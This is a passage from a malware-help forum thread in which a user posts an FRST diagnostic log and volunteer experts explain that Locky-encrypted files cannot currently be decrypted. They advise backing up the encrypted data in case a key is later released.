FirewallRules: [{4B63113D-EA0B-4334-A428-3C3A67BCCFE5}] => C:\Program Files (x86)\SplashData\SplashShopper Desktop\SplashShopper Desktop.exe
FirewallRules: [{4D894AA0-7D8E-45E3-AD73-ED06CBC619FD}] => C:\Program Files (x86)\SplashData\SplashShopper Desktop\SplashShopper Desktop.exe
FirewallRules: [{6DE609A2-112E-4504-8DBB-C54963EB629F}] => I:\Common\EpsonNet Setup\ENEasyApp.exe
FirewallRules: [{4F31EDE2-4DE3-4856-A4C3-7CC1BC03A36E}] => I:\Common\EpsonNet Setup\ENEasyApp.exe
FirewallRules: [{0879753D-6892-4962-8665-C1AB3929BA56}] => C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
FirewallRules: [{5C8BE526-A1C4-484B-851F-7FA123CC3083}] => C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
FirewallRules: [{C0DE496C-975C-4700-ACAB-5CF8ED569EF3}] => C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe
FirewallRules: [{A0ADBAC6-FF70-40D4-82B7-4E7AB6C87D3D}] => C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe
FirewallRules: [{FAEF4F61-0D68-4974-B158-1F1D88F613F5}] => C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamUserAgent.exe
FirewallRules: [{34811BD7-5AA1-4154-8096-5D2AFD62A2B0}] => C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{4E8F7955-1A2A-4D38-9A0A-26F8B1C0D081}] => C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{1183227F-8F60-44F4-BFD6-483BB0626E0E}] => C:\Program Files\HP\HP Officejet Pro 8610\bin\FaxApplications.exe
FirewallRules: [{CC4603FF-F649-42C0-B5E9-D15CA97CEEF1}] => C:\Program Files\HP\HP Officejet Pro 8610\bin\DigitalWizards.exe
FirewallRules: [{480D28FB-7A85-495C-A76E-7DB65B81B845}] => C:\Program Files\HP\HP Officejet Pro 8610\bin\SendAFax.exe
FirewallRules: [{8F52466D-0E61-4E99-879D-0D65035E3032}] => C:\Program Files\HP\HP Officejet Pro 8610\Bin\DeviceSetup.exe
FirewallRules: [{613F0329-2ED0-4ACB-B989-D99B368BE058}] => LPort=5357
FirewallRules: [{EE96252E-7B53-4693-AEE8-A71435FCAA1B}] => C:\Program Files\HP\HP Officejet Pro 8610\Bin\HPNetworkCommunicatorCom.exe

==================== Restore Points =========================

24-01-2017 11:44:04 JRT Pre-Junkware Removal

==================== Faulty Device Manager Devices =============


==================== Event log errors: =========================

Application errors:
==================
Error: (01/24/2017 02:20:29 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: DllHost.exe, version: 10.0.14986.1000, time stamp: 0x5fae2cca
Faulting module name: ntdll.dll, version: 10.0.14986.1000, time stamp: 0xd8fc5bf5
Exception code: 0xc0000005
Fault offset: 0x000000000003c53d
Faulting process id: 0x2708
Faulting application start time: 0x01d2767de5ff3258
Faulting application path: C:\WINDOWS\system32\DllHost.exe
Faulting module path: C:\WINDOWS\SYSTEM32\ntdll.dll
Report Id: f5587d52-a24e-4860-8d30-d00f3678faaa
Faulting package full name:
Faulting package-relative application ID:

Error: (01/24/2017 02:09:54 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: rundll32.exe_ResetEng.dll, version: 10.0.14986.1000, time stamp: 0x4067e605
Faulting module name: ntdll.dll, version: 10.0.14986.1000, time stamp: 0xd8fc5bf5
Exception code: 0xc0000409
Fault offset: 0x00000000000957ef
Faulting process id: 0x2a94
Faulting application start time: 0x01d2767dd3d7699a
Faulting application path: C:\WINDOWS\system32\rundll32.exe
Faulting module path: C:\WINDOWS\SYSTEM32\ntdll.dll
Report Id: 4c5d09f9-5f34-4678-9c31-2b382d6cc0f9
Faulting package full name:
Faulting package-relative application ID:

Error: (01/24/2017 02:05:29 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: DllHost.exe, version: 10.0.14986.1000, time stamp: 0x5fae2cca
Faulting module name: ntdll.dll, version: 10.0.14986.1000, time stamp: 0xd8fc5bf5
Exception code: 0xc0000005
Fault offset: 0x000000000003c53d
Faulting process id: 0x1950
Faulting application start time: 0x01d2767bcd2bfaaf
Faulting application path: C:\WINDOWS\system32\DllHost.exe
Faulting module path: C:\WINDOWS\SYSTEM32\ntdll.dll
Report Id: 69c4132b-9eee-4a47-b25d-e695be67e65e
Faulting package full name:
Faulting package-relative application ID:

Error: (01/24/2017 01:55:21 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: DllHost.exe, version: 10.0.14986.1000, time stamp: 0x5fae2cca
Faulting module name: ntdll.dll, version: 10.0.14986.1000, time stamp: 0xd8fc5bf5
Exception code: 0xc0000005
Fault offset: 0x000000000003c53d
Faulting process id: 0x2d28
Faulting application start time: 0x01d2767a62c414b7
Faulting application path: C:\WINDOWS\system32\DllHost.exe
Faulting module path: C:\WINDOWS\SYSTEM32\ntdll.dll
Report Id: 27e13a43-0e78-4021-b349-694029583fba
Faulting package full name:
Faulting package-relative application ID:

Error: (01/24/2017 01:49:29 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: rundll32.exe_ResetEng.dll, version: 10.0.14986.1000, time stamp: 0x4067e605
Faulting module name: ntdll.dll, version: 10.0.14986.1000, time stamp: 0xd8fc5bf5
Exception code: 0xc0000409
Fault offset: 0x00000000000957ef
Faulting process id: 0x28e0
Faulting application start time: 0x01d2767af9b21589
Faulting application path: C:\WINDOWS\system32\rundll32.exe
Faulting module path: C:\WINDOWS\SYSTEM32\ntdll.dll
Report Id: 30361fb0-10a7-4757-8b22-056317e39741
Faulting package full name:
Faulting package-relative application ID:

Error: (01/24/2017 01:45:11 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: DllHost.exe, version: 10.0.14986.1000, time stamp: 0x5fae2cca
Faulting module name: ntdll.dll, version: 10.0.14986.1000, time stamp: 0xd8fc5bf5
Exception code: 0xc0000005
Fault offset: 0x000000000003c53d
Faulting process id: 0x2760
Faulting application start time: 0x01d27678f7257d2e
Faulting application path: C:\WINDOWS\system32\DllHost.exe
Faulting module path: C:\WINDOWS\SYSTEM32\ntdll.dll
Report Id: 80d6a599-dcc0-4d5c-90be-267fe81f259d
Faulting package full name:
Faulting package-relative application ID:

Error: (01/24/2017 01:34:37 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: DllHost.exe, version: 10.0.14986.1000, time stamp: 0x5fae2cca
Faulting module name: ntdll.dll, version: 10.0.14986.1000, time stamp: 0xd8fc5bf5
Exception code: 0xc0000005
Fault offset: 0x000000000003c53d
Faulting process id: 0x209c
Faulting application start time: 0x01d276777d6bef1e
Faulting application path: C:\WINDOWS\system32\DllHost.exe
Faulting module path: C:\WINDOWS\SYSTEM32\ntdll.dll
Report Id: a08f967e-cb15-45bb-bb18-929285d05152
Faulting package full name:
Faulting package-relative application ID:

Error: (01/24/2017 01:21:13 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: DllHost.exe, version: 10.0.14986.1000, time stamp: 0x5fae2cca
Faulting module name: ntdll.dll, version: 10.0.14986.1000, time stamp: 0xd8fc5bf5
Exception code: 0xc0000005
Fault offset: 0x000000000003c53d
Faulting process id: 0x1c68
Faulting application start time: 0x01d276734c56cf2d
Faulting application path: C:\WINDOWS\system32\DllHost.exe
Faulting module path: C:\WINDOWS\SYSTEM32\ntdll.dll
Report Id: 4ef94bc0-05dc-4e6b-ba44-1cec53db137f
Faulting package full name:
Faulting package-relative application ID:

Error: (01/24/2017 12:52:29 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: rundll32.exe_ResetEng.dll, version: 10.0.14986.1000, time stamp: 0x4067e605
Faulting module name: ntdll.dll, version: 10.0.14986.1000, time stamp: 0xd8fc5bf5
Exception code: 0xc0000409
Fault offset: 0x00000000000957ef
Faulting process id: 0x42c
Faulting application start time: 0x01d27673014f6918
Faulting application path: C:\WINDOWS\system32\rundll32.exe
Faulting module path: C:\WINDOWS\SYSTEM32\ntdll.dll
Report Id: 99fec37e-1aee-4d6a-8cec-770d4ded3f30
Faulting package full name:
Faulting package-relative application ID:

Error: (01/24/2017 12:48:24 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: DllHost.exe, version: 10.0.14986.1000, time stamp: 0x5fae2cca
Faulting module name: ntdll.dll, version: 10.0.14986.1000, time stamp: 0xd8fc5bf5
Exception code: 0xc0000005
Fault offset: 0x000000000003c53d
Faulting process id: 0x186c
Faulting application start time: 0x01d2767108c0529b
Faulting application path: C:\WINDOWS\system32\DllHost.exe
Faulting module path: C:\WINDOWS\SYSTEM32\ntdll.dll
Report Id: 8ba9c4b7-3efb-4db4-86b1-4324441417a3
Faulting package full name:
Faulting package-relative application ID:


System errors:
=============
Error: (01/24/2017 02:28:30 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: The application-specific permission settings do not grant Local Activation permission for the COM Server application with CLSID
{D63B10C5-BB46-4990-A94F-E40B9D520160}
 and APPID
{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}
 to the user NT AUTHORITY\SYSTEM SID (S-1-5-18) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool.

Error: (01/24/2017 02:12:59 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: The application-specific permission settings do not grant Local Activation permission for the COM Server application with CLSID
{D63B10C5-BB46-4990-A94F-E40B9D520160}
 and APPID
{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}
 to the user NT AUTHORITY\SYSTEM SID (S-1-5-18) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool.

Error: (01/24/2017 11:43:42 AM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: The application-specific permission settings do not grant Local Activation permission for the COM Server application with CLSID
{3185A766-B338-11E4-A71E-12E3F512A338}
 and APPID
{7006698D-2974-4091-A424-85DD0B909E23}
 to the user NT AUTHORITY\LOCAL SERVICE SID (S-1-5-19) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool.

Error: (01/24/2017 11:33:12 AM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: The application-specific permission settings do not grant Local Activation permission for the COM Server application with CLSID
{8D8F4F83-3594-4F07-8369-FC3C3CAE4919}
 and APPID
{F72671A9-012C-4725-9D2F-2A4D32D65169}
 to the user NT AUTHORITY\SYSTEM SID (S-1-5-18) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool.

Error: (01/24/2017 11:31:50 AM) (Source: Microsoft-Windows-WLAN-AutoConfig) (EventID: 10003) (User: NT AUTHORITY)
Description: WLAN Extensibility Module has stopped unexpectedly.

Module Path: C:\WINDOWS\System32\bcmihvsrv64.dll

Error: (01/24/2017 11:31:50 AM) (Source: Microsoft-Windows-WLAN-AutoConfig) (EventID: 10003) (User: NT AUTHORITY)
Description: WLAN Extensibility Module has stopped unexpectedly.

Module Path: C:\WINDOWS\System32\bcmihvsrv64.dll

Error: (01/24/2017 11:31:49 AM) (Source: Microsoft-Windows-WLAN-AutoConfig) (EventID: 10003) (User: NT AUTHORITY)
Description: WLAN Extensibility Module has stopped unexpectedly.

Module Path: C:\WINDOWS\System32\bcmihvsrv64.dll

Error: (01/24/2017 11:31:39 AM) (Source: Service Control Manager) (EventID: 7032) (User: )
Description: The Service Control Manager tried to take a corrective action (Restart the service) after the unexpected termination of the Windows Search service, but this action failed with the following error:
An instance of the service is already running.

Error: (01/24/2017 11:31:09 AM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The HP Support Solutions Framework Service service terminated unexpectedly.  It has done this 1 time(s).

Error: (01/24/2017 11:31:09 AM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The NVIDIA GeForce Experience Service service terminated unexpectedly.  It has done this 1 time(s).


CodeIntegrity:
===================================
  Date: 2017-01-24 11:35:49.048
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Bonjour\mdnsNSP.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2017-01-24 11:35:49.047
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Bonjour\mdnsNSP.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2017-01-24 11:28:54.490
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Bonjour\mdnsNSP.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2017-01-24 11:28:54.489
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Bonjour\mdnsNSP.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2017-01-24 11:28:53.624
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Bonjour\mdnsNSP.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2017-01-24 11:28:53.622
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Bonjour\mdnsNSP.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2017-01-24 11:28:23.695
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Bonjour\mdnsNSP.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2017-01-24 11:28:23.694
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Bonjour\mdnsNSP.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2017-01-24 11:14:04.299
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Bonjour\mdnsNSP.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2017-01-24 11:14:04.298
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Bonjour\mdnsNSP.dll that did not meet the Custom 3 / Antimalware signing level requirements.


==================== Memory info ===========================

Processor: Intel(R) Core(TM) i7-2600 CPU @ 3.40GHz
Percentage of memory in use: 48%
Total physical RAM: 8174.52 MB
Available physical RAM: 4179.76 MB
Total Virtual: 9454.52 MB
Available Virtual: 4842.48 MB

==================== Drives ================================

Drive c: (OS) (Fixed) (Total:918.73 GB) (Free:808.77 GB) NTFS
Drive d: (HP_RECOVERY) (Fixed) (Total:12.25 GB) (Free:1.83 GB) NTFS ==>[system with boot components (obtained from drive)]
Drive j: (WD SmartWare) (CDROM) (Total:0.6 GB) (Free:0 GB) UDF
Drive k: (My Passport) (Fixed) (Total:930.86 GB) (Free:894.21 GB) NTFS

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 931.5 GB) (Disk ID: 4A1A018B)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=918.7 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=450 MB) - (Type=27)
Partition 4: (Not Active) - (Size=12.2 GB) - (Type=07 NTFS)

========================================================
Disk: 5 (MBR Code: Windows XP) (Size: 930.9 GB) (Disk ID: 00052F35)
Partition 1: (Not Active) - (Size=930.9 GB) - (Type=07 NTFS)

==================== End of Addition.txt ============================

Offline Ozzie

  • Full Member
  • ***
  • Posts: 55
    • View Profile
Re: File Type Question
« Reply #38 on: January 26, 2017, 03:13:10 PM »
Corinne, would you like me to run FRST without checking all the boxes and post those results.  I honestly did not know what I was doing when I first ran it. 

Also, I have notice when the computer starts and just before everything is ready to go, a very quick flash of a DOS screen comes up with one line of text.  It is so fast that I cannot read it, no have I been quick enough to create a PrntScrn.  That used to never occur, so don't know if it has something to do with this ransomeware or not, but thought it worth mentioning.

Offline Ozzie

  • Full Member
  • ***
  • Posts: 55
    • View Profile
Re: File Type Question
« Reply #39 on: January 26, 2017, 04:46:42 PM »
I just tried to download the newest version of Malwarebytes twice and failed because of the below that appeared in a popup box with a yellow triangle.  I attempted the Retry button several times and the same popup always appeared.  Maybe this has some significance.


C:\WINDOWS\system32\drivers\mbae64.sys

An error occurred while trying to replace the existing file:
DeleteFile failed; code 5
Access is denied.

Clicl Retry to try again, Ignore to skip this file (not
recommended), or Abort to cancel installation.

Offline Corrine

  • The Mystical Rose
  • Administrator
  • Hero Member
  • *****
  • Posts: 19425
  • "Stronger than the past, united in our goal."
    • View Profile
    • Security Garden
Re: File Type Question
« Reply #40 on: January 26, 2017, 05:31:46 PM »
Don't bother with a fresh FRST scan, although I would like to see the Addition.txt that should be in the same folder.

An MBAM scan would be a good idea as I saw something in FRST.txt but also need to check the Addition.txt before providing a script and Malwarebytes may be able to take care of what I saw.

As to updating Malwarebytes, I ran into the same issue with updating from version 3.0.4 to 3.0.5.  Everything I tried including a complete uninstall and using FRST didn't solve the problem so I ended up clicking the not recommended Skip this file.  I was then able to update to 3.0.5 and subsequently to 3.0.6.  See if that works for you.


Take a walk through the "Security Garden" -- Where Everything is Coming up Roses!

Remember - A day without laughter is a day wasted.
May the wind sing to you and the sun rise in your heart.

Offline Ozzie

  • Full Member
  • ***
  • Posts: 55
    • View Profile
Re: File Type Question
« Reply #41 on: January 26, 2017, 07:35:51 PM »
I posted the Addition.txt at 3:05:33 up above. 

I was also able to get a print screen of that DOS screen that pops up now.  Should I share the content here or send it to you privately, if there is a way to do so.

Offline quietman7

  • Malware Experts
  • Jr. Member
  • *****
  • Posts: 22
    • View Profile
Re: File Type Question
« Reply #42 on: January 26, 2017, 10:22:08 PM »
Sorry for the late reply but I was out of town for a few days and did not receive Corrine's PM until I returned.

Whether you can recover (decrypt) your files or not depends on what ransomware infection you are dealing with and a variety of factors. All crypto malware ransomware use some form of encryption algorithms, most of them are secure, but others are not. The possibility of decryption depends on the thoroughness of the malware creator, what algorithm the creator utilized for encryption, discovery of any flaws and sometimes just plain luck. Newer ransomware variants use a public and private key system where the public key is used to encrypt and the private key is used to decrypt. The private key is stored on a central server maintained by the cyber-criminals and not available unless the victim pays the ransom or at some point, law enforcement authorities arrest the criminals...seize the C2 server and release the private RSA decryption keys to the public. In some cases, the cyber-criminals, for whatever reason, choose to release the master keys after a period of time.
Quote
Dr.Web statistics show that the probability of restoring files compromised by encryption ransomware doesn't exceed 10%. That means that most of user data has been lost for good!
Dr.Web: Encryption ransomware - Threat No. 1

Unfortunately, there is no known way to decrypt files encrypted by CryptoWall, CTB-Locker, Locky (all variants), Mobef, Shade, DEDCryptor, Zyklon Locker (GNL), newer variants of PClock, newer variants of Al-Namrood/Apocalypse and many other ransomware variants without paying the ransom. This is primarily due to the type of encryption used and the fact that the key is not generated on the victim's computer ensuring it is much harder to break. Unless the criminals are found and arrested by the authorities, and/or the keys are recovered then provided to the public, there is no possibility that anyone can provide a decryption tool.

As already mentioned here...the best solution for dealing with encrypted data is to restore from backups. These types of infections typically will delete all Shadow Volume Copies so that you cannot restore your files via System Restore, native Windows Previous Versions or using a program like Shadow Explorer. But it never hurts to try in case the malware did not do what it was supposed to do...it is not uncommon for ransomware infections to sometimes fail to properly delete Shadow Volume Copies. In some cases the use of file recovery software such as R-Studio or Photorec may be helpful to recover some of your original files but there is no guarantee that will work...again it never hurts to try.

In cases where there is no workable free decryption fix tool and victims are not willing to pay the ransom, the only other alternative is to backup/save your data as is and wait for a possible breakthrough...meaning, what seems like an impossibility at the moment (decryption of your data), there is always hope someday there may be a potential solution so save the encrypted data and wait until that time. Imaging the drive backs up everything related to the infection including encrypted files, ransom notes and registry entries containing possible information which may be needed if a solution is ever discovered. The encrypted files do not contain malicious code so they are safe. Even if a decryption tool is available, there is no guarantee it will work properly or that the malware developer will not release a new variant to defeat the efforts of security researchers so keeping a backup of the original encrypted files and related information is a good practice.
Microsoft MVP - Consumer Security 2007-2015
Microsoft MVP Reconnect 2016
Windows Insider MVP 2017
Member of UNITE, Unified Network of Instructors and Trusted Eliminators

Offline Ozzie

  • Full Member
  • ***
  • Posts: 55
    • View Profile
Re: File Type Question
« Reply #43 on: January 28, 2017, 05:03:33 PM »
Thank you so much, Quietman7.  After all the reading I've done, I was afraid something like this might be the response, not what I wanted to hear but what I feared. 

From you message above, I understand that:

I need to back up the computer as it is now.  Have to buy another external drive to accomplish that.  The one I have that had never been used did not work on this newer computer, etc.  The backup is so that, if in the future, a key is found/released to unencrypt the data I will have it available.

  That the ransomeware should not effect any future documents, etc.

If I have misunderstood, please let me know.

I also have a question about the harddrive.  Although I understand computer to a large extent (at least I think I do - but I don't understand much about viruses and that ilk), I would like anyone's opinion about this.  If the current harddrive is removed and a new one intalled will the ransomeware no longer be in the computer.  I know this is a dumb question, but I would like to know the answer.  I am more than willing to buy a new internal hard drive.

Thank you all for your patience and understanding of my situation and my ignorance about some matters.

Offline quietman7

  • Malware Experts
  • Jr. Member
  • *****
  • Posts: 22
    • View Profile
Re: File Type Question
« Reply #44 on: January 28, 2017, 09:07:09 PM »
I wish I had better news but unfortunately Locky is one of those variants which currently is not decryptable. But there is always hope....After about a year, the criminals behind TeslaCrypt shut down and released the master decryption key so thousands of victims were able to get back their files if the backed up and saved them. So backup/save your data as is and wait for a possible breakthrough...meaning, what seems like an impossibility at the moment (decryption of your data), tthere is always hope someday there may be a potential solution so save the encrypted data and wait until that time. Imaging the drive backs up everything related to the infection including encrypted files, ransom notes and registry entries containing possible information which may be needed if a solution is ever discovered.

Corrine posted the link for the Locky Ransomware Support and Help Topic on the first page. I suggest you subscribe to it. When or if a solution is found, that information will be provided in that support topic and you will receive notification if subscribed to it.

Most crypto malware ransomware is typically programmed to automatically remove itself...the malicious files responsible for the infection...after the encrypting is done since they are no longer needed. That explains why many security scanners do not find anything after the fact. The encrypted files do not contain malicious code so they are safe.

Crypto malware ransomware typically propagates itself as a Trojan Horse. Trojans do not reproduce by infecting other files nor do they self-replicate. Instead they spread through social engineering and human exploit/interaction (the weakest link in security).
Quote
Section 2 in this topic explains in more detail the most common methods Crypto malware (file encrypting ransomware) and other forms of ransomware is typically delivered and spread.

Unfortunately, most victims do not realize they have been infected until the ransomware displays the ransom note and the files have already been encrypted. In some cases there may be no ransom note and discovery only occurs at a later time when attempting to open an encrypted file. As such, they don't know how long the malware was on the system before being alerted or if other malware was downloaded and installed along with the ransomware. If other malware was involved it could still be present so posting for assistance at a forum like this with experts checking your system is a wise thing to do.
Microsoft MVP - Consumer Security 2007-2015
Microsoft MVP Reconnect 2016
Windows Insider MVP 2017
Member of UNITE, Unified Network of Instructors and Trusted Eliminators